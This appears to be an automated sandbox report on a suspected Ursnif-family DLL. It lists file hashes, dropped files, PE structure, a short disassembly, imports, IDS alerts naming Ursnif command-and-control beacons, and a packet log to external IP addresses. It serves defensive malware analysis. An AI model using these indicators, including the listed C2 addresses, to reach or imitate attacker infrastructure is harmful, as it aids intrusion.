SHA1: | 8FAE67C648415ED7E61441FBE291B1F08C7D84BE |
SHA-256: | E8DA5CF423A1B30352B81E352EE8DB57725A63D96108646467D25B09E19A5F76 |
SHA-512: | 24515C4D1D0CF8600A17480087A9C1A32510E15816FD97DB6CB72203EA557E7C23F21E2B8DAAC29AF19894000A6A4E8F621A8651F44CA44494280C363471B44D |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8290 |
Entropy (8bit): | 3.696150034621855 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiAH6bef6YWdSU5OqgmfYSZ9CpDl89bFmsf6Xm:RrlsNio6Cf6Y8SU5OqgmfYSZFFfT |
MD5: | E2C283F6E9C9F27B1B6E7F14D88094C9 |
SHA1: | 680DF4EF66AE32C292A14A8F17BBE7A6A5597DDC |
SHA-256: | 6F86ACD2083CFDCD45A58DF4638BD3E640559A18B9ABC8D8C96A4F4CA1B70349 |
SHA-512: | B93CB9B980FFB36425E5A71CF7F5D269EF0FC95A319B78D5F3DEEC7BE33BD2B91C515DC7BADCBEF55056AFCDBAA8098F1DF8EEAA14E6E01AE5CCD41375A1D8C6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4558 |
Entropy (8bit): | 4.434078780575867 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsuJgtWI9CcWgc8sqYjk8fm8M4J2+7F/gh+q84ARKcQIcQw0kd:uITfkFVgrsqYtJnOwKkw0kd |
MD5: | AD092981409016DC61C4616952F5AEE9 |
SHA1: | 758103A72993DEF8378E720B580EF3C9ACECEB18 |
SHA-256: | 75207810F0A20613C0A11661346A5546D1A1F6A803969A52A40BB8BBDB1DF012 |
SHA-512: | 96D960E15081E3AC1503A287CD4FD581A7D43E72056FE946EB84E1744A3698653FD146CD60003C1BBE434D45D1EDD51B21C5FFE2018D876E17C52B918150F91C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr |
MD5: | 1F1446CE05A385817C3EF20CBD8B6E6A |
SHA1: | 1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D |
SHA-256: | 2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE |
SHA-512: | 252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.0931050765106587 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryfVak7YnqqiaPN5Dlq5J:+RI+ycuZhNNVakSiaPNnqX |
MD5: | 02C3662D4C9E197ADEB1CC2C6BEF46F5 |
SHA1: | 6D53EC3C48A5D1F25B32D59AF0A15740CD65E193 |
SHA-256: | F951EA74829FCE379D430EA52C6E67402CAAFF04DF0906D7EDB4B76ABB963562 |
SHA-512: | B8B6BF53159D147A25FFBDA73400B6119FAD651F0E32F7C2A8A9220D4B6EA7121B1AE8B481CC2E5AC98E8BC3F9094744D8A29DC45866E6035FC8E1BD10ACCF93 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1133483598409657 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBak7YnqqFPN5Dlq5J:+RI+ycuZhNjakSFPNnqX |
MD5: | 9539704CDC4933899E44EEFA3C61D608 |
SHA1: | CA3ABD82D814B1679ED449248896A5BABBA9DAF4 |
SHA-256: | 7E05C7E8A8EE0D2E2C90BF4126DD2714DF469CD920B9832C55B58EC9B6E6B4AE |
SHA-512: | 7A390EC42F2509B75B40C31CE05F239096555CF51B45693482675B7B18B46359F9707DD959CD8750BF3588EA4A7114981C54145AC517265082ECAFEE39CAC0C4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9822378198203157 |
Encrypted: | false |
SSDEEP: | 24:HR3nW9rtjHQTKhHvYhKdNWI+ycuZhNjakSFPNnq9hgd:JWxQaPaKd41ulja3fq9y |
MD5: | 09B3C60D2220594D5764CF805341CC0E |
SHA1: | 555EEEB4FCC58F515C25005F000D88686B04AD32 |
SHA-256: | 3EFC57A094F328BBEA3EB475295462DA3C26FB3F3FED6AB0EB25D35F263150A3 |
SHA-512: | C30E50256D1C37B63EAF9EE1C2379EAD807A4BBA2173D8444640EDFBF553D3784E1F75A5E6AF57719B6088E6BB562D50B1F21C592484BAEEA0C333ED93643D0B |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9747905175308915 |
Encrypted: | false |
SSDEEP: | 24:H/nW9r00ehHnfhKdNWI+ycuZhNNVakSiaPNnq9hgd:vW00iH5Kd41ulNVa3iWq9y |
MD5: | 72B817498A9CB15C74DD2FA541EC0561 |
SHA1: | 7E91DCA4483F6E04A51ADC829DA393235EBD810A |
SHA-256: | 779F0A35D8986CABDE9796A33471BAC978357938416782ECDB889D7A99FE3373 |
SHA-512: | B007342425DCA6B16FFED7589285344882DFB6F2CFB1A4808F3F7131605316DC5ADE93426A7AEA4052E2F030018F7A78672F5DF83F72EF86D86A8963AE936148 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.267478878877476 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fxzxs7+AEszIWXp+N23fAx:p37Lvkmb6KHZWZE8E |
MD5: | F09794D488DBC35AA92B8C90362AB28B |
SHA1: | AFFAAEE2DBD7D8C475CEEBB8815C8614545FEEC4 |
SHA-256: | 3AAF9335F5405A242AA66C1A9CEE285868C0727DC4A61E05AC0FE7113AC7685E |
SHA-512: | F9474796B81FD1A7A2D5FBE9F862BBEA8C8B5DF20F74113A621D38A38BCECC9018BEC80A488C504AF49CA8346A478CE8B445700206666BE1E7C25C7D03D01876 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6227922787586184 |
Encrypted: | false |
SSDEEP: | 24:etGSQ8OmU0t3lm85xWAseO4zKQ64pfUPtkZfvk1jVUWI+ycuZhNjakSFPNnq:6qXQ3r5xNORQfUuJvk1x31ulja3fq |
MD5: | BA975FCAFEA5BC2179880CE7E01A1CE9 |
SHA1: | 89AA86AEE421A044758CED62E646EC441E4D19AA |
SHA-256: | 9CBC012D926A95136E9FD40E9C658E31C21CDB26E8B32A08B4AF800E87DD8393 |
SHA-512: | F7FDF23A020418EE7AE7E7FBF41EB20F14E97BC3D8F8A6440AF87DF605374A779BD37467EA49E7957ECB4BC9AD996A2D026B0ED28F9360A88DE274F68D54786F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.323228230759943 |
Encrypted: | false |
SSDEEP: | 12:xKIR37Lvkmb6KHZWZE8RKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KH+E8RKaM5DqBVKVrdFAMBJTH |
MD5: | A0732BCB2CCDA94D5B47A60F929FDA61 |
SHA1: | D0287555EE56BB8426AE01086C1DAAB0E0F4F236 |
SHA-256: | AC734E3395B9C500CC77255FF2529DE39CB0A83D451B49D7569F5C2C69BAAF40 |
SHA-512: | EB660C6A09D0566935FF383D15F6A68C0BD0F45D6ED35D7708913C9F4CFEF59CA4067BB52766BF798DF02292E41019A6CD004767FB628AF9BE44272CDAA44B1D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.263922468747438 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fxC10zxs7+AEszIWXp+N23fxCdx:p37Lvkmb6KHpC10WZE8pCdx |
MD5: | 26231D50B2E9AE0CA2486C11856271F6 |
SHA1: | D298368A287C8C654C2AD890F58E1101C89C6EA8 |
SHA-256: | 835E5B1E3D6F2806D2371B4160EACC27A46F424879338811A286CAC5D101BB9A |
SHA-512: | 45534EB37809F3DBBF99142A0E0C72BF02C0715C39A05DA35955F112BA8AA167A05DCBE595D4A14A44D011190CA91BC6902D8B0C39B5E3AEDDAAEC208B65F239 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.5937782577305875 |
Encrypted: | false |
SSDEEP: | 24:etGStE/u2Bg85z7xlfwZD6BgdWqtkZfrOHWI+ycuZhNNVakSiaPNnq:6ttYb5hFCD6MWdJr11ulNVa3iWq |
MD5: | 3D1BB357CA2468341DC1D0CD0CBDE50C |
SHA1: | E3012818931B5770C9EEE1842C196200084ED3B6 |
SHA-256: | 33F58C94D43F3F42D1A83E10568235E6BEB88B6A89634140390607FC845AF545 |
SHA-512: | 4D01A41FDBB5375DC04F659F6EE2499F0A3F27F650BE8F7CBCC7ED0136BE8D19CA31E003700B4D3B1F14AF6745AD9EB50AD4F82082FFFD9589DAF184790FBB6A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.323727982984064 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KHiE8EUKaM5DqBVKVrdFAMBJTH:Akka6AiE8dKxDcVKdBJj |
MD5: | 38B9762A37D60558FC21EF41B824F2A0 |
SHA1: | 4E987BFAEC62799D5483B2E8F93A3020C751FC30 |
SHA-256: | B946DFDE616FFF8EC403135CE6C2AE909E6A48C983880262A3307DC9140F69AA |
SHA-512: | 6FEB9920BB44D00C561F65DD97E3FA15AF546ACEC2B5656F6DF711F1FB03073F9289265F83ED7DCE5364B94AEC7D28AFB1F78F16D4F61353547841EF80B6D914 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220526\PowerShell_transcript.530978.TCpPiQsC.20220526040704.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1367 |
Entropy (8bit): | 5.3900988864716135 |
Encrypted: | false |
SSDEEP: | 24:BxSA/DoCxvBnKx2DOXUW/pvLCHcKo4qWFHjeTKKjX4CIym1ZJXnDfpvLCHcKo4AO:BZ/c+vhKoOfpMlo4tFqDYB1ZJrpMlo4P |
MD5: | AEBC39EB79C9C79BE09DC92C39A235C9 |
SHA1: | 68CD50B3E46C3D14867EA2E6C7B2CFF6AF055B18 |
SHA-256: | 4E4703A45109ADCD12197DDC332C84B45AFCA38DDE5B515A31CB93F31D694F65 |
SHA-512: | 4E2E2D52A15D894753F12CBEAEA480C3787D30888CBDC2957688617DD2C4A1E442290E86E4E8678A262762B1564C679046BDA7FE48ED5F4AFA866F2F1232A91B |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.281218339920859 |
TrID: |
|
File name: | lokvQRcUe0.dll |
File size: | 438272 |
MD5: | 5de5e3440620950f0be99fc6728c7afe |
SHA1: | 43cbdfe6773ce518847b89f177a555e6bece283b |
SHA256: | 2d83e172a42b032b32606b203f2a1a9736acfd86e76ede8ff57b3292c035d139 |
SHA512: | 674a545d51127efec4ad74ff97d6836a5a7c3f6c186de5a0be18bd1c619de4ffcd166409f52624b046ce4e48a0c432c2e19f6008741b8f117434229121f05c0e |
SSDEEP: | 6144:SKmLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:SsBUSzjLIRBMkf9dHLpKepKr6CvXG |
TLSH: | 1C94F14897685D66D84647370CE1931EFCE7FE2EE63B7ABE20642C8FF95B0104516B0A |
File Content Preview: | MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401520 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3EC34607 [Thu May 15 07:47:19 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 8000dfa78ad003480e4532227762516a |
Instruction |
---|
push ebp |
mov ebp, esp |
inc edx |
add ecx, FFFFFFFFh |
call 00007F5484979D7Ah |
pop eax |
pop eax |
mov dword ptr [004136F4h], eax |
mov edx, dword ptr [00413810h] |
sub edx, 00005289h |
call edx |
mov eax, ebx |
mov dword ptr [004136F0h], eax |
mov eax, esi |
mov dword ptr [004136E8h], eax |
mov dword ptr [004136F8h], ebp |
mov dword ptr [004136ECh], edi |
add dword ptr [004136F8h], 00000004h |
loop 00007F5484979D27h |
mov dword ptr [ebp+00h], eax |
nop |
nop |
mov ah, 03h |
sbb byte ptr [ebp+6Fh], FFFFFF82h |
and dword ptr [ecx+0Bh], esp |
out D4h, al |
or cl, byte ptr [esi] |
mov eax, dword ptr [0B7E1EADh] |
in eax, dx |
shr dword ptr [edi-49h], 1 |
push ebx |
movsd |
jmp 00007F540FFF410Bh |
imul dh |
mov eax, dword ptr [F34D615Bh] |
call 00007F5417E6CD1Ch |
xlatb |
pop esp |
cmp dl, dh |
salc |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd8a0 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6b000 | 0xf3c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x7c | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb8c0 | 0xc000 | False | 0.0830485026042 | data | 1.12968558601 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0xbea | 0x1000 | False | 0.286865234375 | data | 4.80937731513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xe000 | 0x7b80 | 0x6000 | False | 0.380004882812 | data | 5.99890283293 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x16000 | 0x1dc01 | 0x1e000 | False | 0.988452148437 | data | 7.98104004555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x34000 | 0x2c91e | 0x2d000 | False | 0.988232421875 | data | 7.98142116636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x61000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51666400073 | IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ |
.reloc | 0x6b000 | 0x133a | 0x2000 | False | 0.218994140625 | data | 3.75989927364 | IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x61360 | 0x666 | data | English | United States |
RT_ICON | 0x619c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x66228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x687d0 | 0xea8 | data | English | United States |
RT_ICON | 0x69678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x69f20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6a488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6a540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6a660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6a7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6a9c0 | 0xf8 | data | English | United States |
RT_DIALOG | 0x6aab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6ab58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6ac48 | 0x4c | data | English | United States |
RT_VERSION | 0x6ac98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
ADVAPI32.dll | EnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount |
msvcrt.dll | fgetwc, strcoll |
USER32.dll | GetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn |
GDI32.dll | GetCharWidthFloatA, GetTextMetricsW, ExtEscape |
OLEAUT32.dll | LoadTypeLibEx |
KERNEL32.dll | GetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken |
---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/26/22-04:06:31.790854 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49743 | 80 | 192.168.2.3 | 13.107.42.16 |
05/26/22-04:06:53.058632 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
05/26/22-04:06:53.058632 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 26, 2022 04:06:52.822370052 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822411060 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822509050 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822561026 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822586060 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822607040 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822612047 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822630882 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822638035 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822657108 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822763920 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822801113 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822827101 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822853088 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822875023 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822900057 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822900057 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822942019 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.823204041 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823231936 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823256969 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.823287010 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.823309898 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823328018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823345900 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823374033 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.823410034 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836559057 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836584091 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836602926 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836615086 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836632967 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836647987 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836664915 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836678982 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836697102 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836702108 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836714029 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836733103 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836735964 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836740017 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836751938 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836761951 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836771011 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836782932 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836797953 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836801052 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836816072 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836829901 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836833000 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836852074 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
